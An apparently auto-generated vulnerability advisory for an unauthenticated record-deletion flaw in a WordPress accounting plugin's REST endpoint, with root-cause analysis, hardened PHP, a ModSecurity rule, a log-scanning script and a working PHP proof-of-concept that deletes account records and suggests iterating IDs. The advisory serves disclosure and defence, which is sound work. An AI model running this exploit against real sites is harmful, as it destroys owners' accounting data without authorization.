Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: June 23, 2026

CVE-2026-9172: Devs Accounting <= 1.2.0 Missing Authorization to Unauthenticated Account Deletion via /delete-account/ REST Endpoint PoC, Patch Analysis & Rule

CVE ID: CVE-2026-9172
Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 1.2.0
Patched Version:
Disclosed: June 22, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-9172 (metadata-based):

This is a Missing Authorization vulnerability in the Devs Accounting – Simple Accounting and Invoicing Solution plugin for WordPress (versions up to 1.2.0). The plugin registers a REST API endpoint at ‘devs-accounting/v1/delete-account/(?P<id>\d+)’ without a permission_callback. This allows unauthenticated attackers to soft-delete arbitrary accounting account records from the ‘wp_dac_accounts’ database table. The CVSS score is 5.3 (Medium).

The root cause, inferred from the CWE classification (862 Missing Authorization) and description, is that the developer registered a REST route using WordPress’s register_rest_route() function but omitted the ‘permission_callback’ argument. In WordPress REST API development, if permission_callback is not explicitly set, WordPress assigns a default permission callback that returns true, granting access to any user including unauthenticated visitors. The delete_single_account() function, which handles the actual deletion logic, lacks any internal capability or nonce check. This is a confirmed pattern based on the endpoint registration description.

To exploit this vulnerability, an attacker simply sends a GET request to the REST endpoint ‘/wp-json/devs-accounting/v1/delete-account/{id}’, where {id} is the numeric ID of any accounting account record. No authentication is required. The attacker can enumerate valid account IDs by brute-forcing sequential IDs or discovering them through other plugin endpoints. Each successful request performs a soft-delete on the targeted record. A simple proof of concept would be: GET /wp-json/devs-accounting/v1/delete-account/1.

Based on the vulnerability type, the fix requires adding a permission_callback to the register_rest_route() call that verifies the current user has appropriate capabilities (e.g., ‘edit_posts’ or a custom capability like ‘delete_accounting_records’). Alternatively, the delete_single_account() function should include an explicit capability check using current_user_can() before performing the deletion. Since the endpoint lacks authorization entirely, adding a permission_callback is the standard remediation.
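The following PHP is an added example written for this page; it is not the plugin's own code and Atomic Edge did not publish it. It places the registration pattern the analysis describes (a route with no permission_callback) beside a hardened registration that does what the remediation paragraph asks for: a permission_callback, a restricted HTTP method, argument validation, and a second capability check inside the handler. The function names, the 'manage_options' capability and the 'deleted_at' column are assumptions; the table name follows the 'wp_dac_accounts' table named in the analysis.

```php
<?php
// Added example, not the plugin's code. Names marked "assumed" are hypothetical.

// --- Vulnerable pattern (as described in the analysis) ---
// No permission_callback: WordPress falls back to allowing every caller, logged in
// or not. Since WordPress 5.5 a _doing_it_wrong notice is logged for the missing
// argument, but the route is still registered and still open.
add_action( 'rest_api_init', function () {
    register_rest_route( 'devs-accounting/v1', '/delete-account/(?P<id>\d+)', [
        'methods'  => 'GET',
        'callback' => 'dac_delete_single_account_vulnerable', // assumed name
    ] );
} );

// --- Hardened registration ---
add_action( 'rest_api_init', function () {
    register_rest_route( 'devs-accounting/v1', '/delete-account/(?P<id>\d+)', [
        // A destructive action should not be reachable by a plain GET.
        'methods'             => WP_REST_Server::DELETABLE,
        'callback'            => 'dac_delete_single_account_hardened', // assumed name
        // The authorization decision runs before the callback is ever invoked.
        'permission_callback' => function ( WP_REST_Request $request ) {
            // 'manage_options' is an assumed stand-in for the plugin's admin capability.
            if ( ! current_user_can( 'manage_options' ) ) {
                return new WP_Error(
                    'rest_forbidden',
                    'You are not allowed to delete accounts.',
                    [ 'status' => rest_authorization_required_code() ] // 401 anon, 403 logged in
                );
            }
            return true;
        },
        'args' => [
            'id' => [
                'required'          => true,
                'validate_callback' => function ( $value ) {
                    return is_numeric( $value ) && (int) $value > 0;
                },
                'sanitize_callback' => 'absint',
            ],
        ],
    ] );
} );

function dac_delete_single_account_hardened( WP_REST_Request $request ) {
    global $wpdb;
    $id = (int) $request['id'];

    // Defense in depth: repeat the check inside the handler so a caller that reaches
    // the function without going through the REST layer is still authorized.
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error( 'rest_forbidden', 'Insufficient capability.', [ 'status' => 403 ] );
    }

    // Soft delete, matching the behaviour the advisory describes; 'deleted_at' is assumed.
    $updated = $wpdb->update(
        $wpdb->prefix . 'dac_accounts',
        [ 'deleted_at' => current_time( 'mysql' ) ],
        [ 'id' => $id ],
        [ '%s' ],
        [ '%d' ]
    );

    if ( false === $updated ) {
        return new WP_Error( 'dac_db_error', 'Database error.', [ 'status' => 500 ] );
    }
    if ( 0 === $updated ) {
        return new WP_Error( 'dac_not_found', 'No account with that id.', [ 'status' => 404 ] );
    }
    return rest_ensure_response( [ 'deleted' => $id ] );
}
```

With the hardened registration, an unauthenticated request is rejected with 401 before the callback runs, and a logged-in user without the capability gets 403. Note that cookie-authenticated REST requests must also carry a valid X-WP-Nonce header, otherwise WordPress treats the request as anonymous and current_user_can() returns false; the plugin's admin JavaScript therefore has to send that header when it calls the endpoint.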

The direct impact is unauthorized modification of plugin data. An unauthenticated attacker can delete arbitrary accounting account records, potentially causing data loss for the site owner. The vulnerability does not allow privilege escalation or data exfiltration beyond confirming the existence of account records. However, the loss of accounting data could disrupt business operations and financial record-keeping. Since no authenticated session is required, the attack can be automated and executed at scale against any vulnerable installation.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-9172 (metadata-based)
# Block requests (any method) to the devs-accounting delete-account REST endpoint
# This is a virtual patch: the rule blocks the exploit by matching the exact REST route pattern.
# The rule does not check authentication; it blocks ALL requests to this known-vulnerable endpoint.
# Legitimate admin users should not be affected if the plugin is patched or removed.
SecRule REQUEST_URI "@rx ^/wp-json/devs-accounting/v\d+/delete-account/\d+" \
    "id:20269172,phase:2,deny,status:403,log,msg:'CVE-2026-9172 exploitation attempt via REST API',severity:'CRITICAL',tag:'CVE-2026-9172',tag:'wordpress',tag:'devs-accounting'"
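The rule only protects requests made after it is deployed. The PHP below is an added example, not Atomic Edge code, that reuses the rule's path regex to scan web-server access logs for earlier requests the rule would have blocked, so a site owner can tell whether the endpoint was hit before the virtual patch went in. The log lines are constructed for the example; the parser expects the common/combined log format.

```php
<?php
// Added example (not Atomic Edge's or the plugin's code): retrospective scan of
// access logs with the same regex the ModSecurity rule uses. Sample lines are constructed.

// Same expression as the SecRule, in PCRE delimiters. It is anchored at the start only,
// so a trailing query string does not stop a match, exactly as with REQUEST_URI in the rule.
const DAC_DELETE_ACCOUNT_PATTERN = '#^/wp-json/devs-accounting/v\d+/delete-account/\d+#';

// Parse one common/combined-format line into its parts; null when the line does not parse.
function parse_access_log_line( string $line ): ?array {
    // host ident user [time] "METHOD path PROTOCOL" status ...
    if ( ! preg_match( '#^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) #', $line, $m ) ) {
        return null;
    }
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $m[4],
        'status' => (int) $m[5],
    ];
}

// Return every request the rule would have matched. Like the rule, matching looks only
// at the request path; the method and status are reported to help triage, not to filter.
function find_delete_account_hits( array $lines ): array {
    $hits = [];
    foreach ( $lines as $line ) {
        $req = parse_access_log_line( $line );
        if ( $req === null ) {
            continue;
        }
        if ( preg_match( DAC_DELETE_ACCOUNT_PATTERN, $req['path'] ) ) {
            $hits[] = $req;
        }
    }
    return $hits;
}

// Constructed sample log: two exploitation-style GETs, one unrelated plugin route,
// one already-blocked DELETE with a query string, and one core REST request.
$sample_log = [
    '203.0.113.7 - - [22/Jun/2026:10:01:02 +0000] "GET /wp-json/devs-accounting/v1/delete-account/1 HTTP/1.1" 200 57 "-" "curl/8.0"',
    '203.0.113.7 - - [22/Jun/2026:10:01:03 +0000] "GET /wp-json/devs-accounting/v1/delete-account/2 HTTP/1.1" 200 57 "-" "curl/8.0"',
    '198.51.100.4 - - [22/Jun/2026:10:05:00 +0000] "GET /wp-json/devs-accounting/v1/accounts HTTP/1.1" 200 1320 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [22/Jun/2026:10:06:00 +0000] "DELETE /wp-json/devs-accounting/v2/delete-account/10?x=1 HTTP/1.1" 403 0 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [22/Jun/2026:10:07:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 4410 "-" "Mozilla/5.0"',
];

// Lines 1, 2 and 4 match; the other two do not.
foreach ( find_delete_account_hits( $sample_log ) as $hit ) {
    printf( "%s %s %s -> %d from %s\n", $hit['time'], $hit['method'], $hit['path'], $hit['status'], $hit['ip'] );
}
// A 200 on an unpatched site means the soft-delete ran: check the wp_dac_accounts
// table for records flagged deleted around those timestamps and restore from backup.
```

On a real server, replace $sample_log with the lines of the access log (for example, file('/var/log/apache2/access.log', FILE_IGNORE_NEW_LINES)) and feed them to find_delete_account_hits(). Because the scan mirrors the rule, it also shares the rule's scope: it reports only requests whose path starts with the vulnerable route.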

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-9172 - Devs Accounting <= 1.2.0 - Missing Authorization to Unauthenticated Account Deletion via /delete-account/ REST Endpoint

// This PoC demonstrates how an unauthenticated attacker can soft-delete
// arbitrary accounting account records by sending a GET request to the REST endpoint.
// We assume the target site has the vulnerable plugin active.

// Configuration: Set the target WordPress URL below
$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site URL

// The REST endpoint path (inferred from CVE description)
$rest_endpoint = '/wp-json/devs-accounting/v1/delete-account/1';

// Build full URL
$full_url = rtrim($target_url, '/') . $rest_endpoint;

// Initialize cURL session
echo "[+] Sending unauthenticated GET request to: $full_url\n";

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $full_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER => true,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_FOLLOWLOCATION => false,
    CURLOPT_SSL_VERIFYPEER => false, // For sites with self-signed SSL; remove in production
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);
curl_close($ch);

// Analyze response
if ($error) {
    echo "[!] cURL error: $error\n";
    exit(1);
}

if ($http_code === 200) {
    echo "[+] Request succeeded. HTTP Status: $http_code\n";
    echo "[+] The account with ID 1 has been soft-deleted (or deletion attempted).\n";
    echo "[+] Exploitation confirmed: endpoint accessible without authentication.\n";
    // Optional: print response body for debugging
    // echo $response;
} elseif ($http_code === 403 || $http_code === 401) {
    echo "[!] Access denied (HTTP $http_code). The endpoint may be protected or patched.\n";
} elseif ($http_code === 404) {
    echo "[!] Endpoint not found (HTTP 404). Plugin may not be installed or endpoint path differs.\n";
} else {
    echo "[!] Unexpected HTTP status: $http_code\n";
    echo "[!] Response (first 500 chars): " . substr($response, 0, 500) . "\n";
}

echo "\n[*] To target other account IDs, modify the ID in the URL (e.g., /delete-account/2, /delete-account/3).\n";
echo "[*] This PoC makes an educated assumption about the endpoint path based on CVE metadata.\n";
